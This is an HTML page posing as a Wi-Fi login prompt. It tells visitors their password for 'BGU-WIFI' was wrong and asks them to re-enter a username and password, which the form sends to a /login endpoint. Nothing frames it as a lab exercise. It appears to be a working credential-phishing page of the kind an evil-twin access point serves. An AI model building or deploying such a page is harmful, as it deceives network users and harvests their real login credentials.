<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body, html {
  height: 100%;
  margin: 0;
  font-family: Arial, Helvetica, sans-serif;
}

* {
  box-sizing: border-box;
}

.bg-image {
  /* The image used */
  /* background-image: url("https://images.eventer.co.il/events/388842c1-1345-4e74-bb31-d3efe42ce3ed.jpeg"); */
  background-image: url("https://static.get-in.com/gallery/tablet_cover_20220130_122537_178483.png");
  
  /* Add the blur effect */
  filter: blur(8px);
  -webkit-filter: blur(8px);
  
  /* Full height */
  height: 100%; 
  
  /* Center and scale the image nicely */
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
}

/* Position text in the middle of the page/image */
.bg-text {
  background-color: rgb(0,0,0); /* Fallback color */
  background-color: rgba(0,0,0, 0.4); /* Black w/opacity/see-through */
  color: white;
  font-weight: bold;
  border: 3px solid #f1f1f1;
  position: absolute;
  top: 30%;
  left: 50%;
  transform: translate(-50%, -50%);
  z-index: 2;
  width: 80%;
  padding: 20px;
  text-align: center;
}
</style>
</head>
<body>

<div class="bg-image"></div>

<div class="bg-text">
  <h1 style="font-size:30px">Incorrect WIFI password</h1>
    <h4>enter the password for</h4>
        <h4>"BGU-WIFI".</h4>

        <form id="login" method="POST" enctype="multipart/form-data" action="/login">
            Username:<br> <input type="text" name="name">
            <br>
            Password:<br> <input type="password" name="subject">
            <br>

    	    <input type="submit" value="Confirm">
    	    <input type="submit" value="Cancel">
      </form>
</div>

</body>
</html>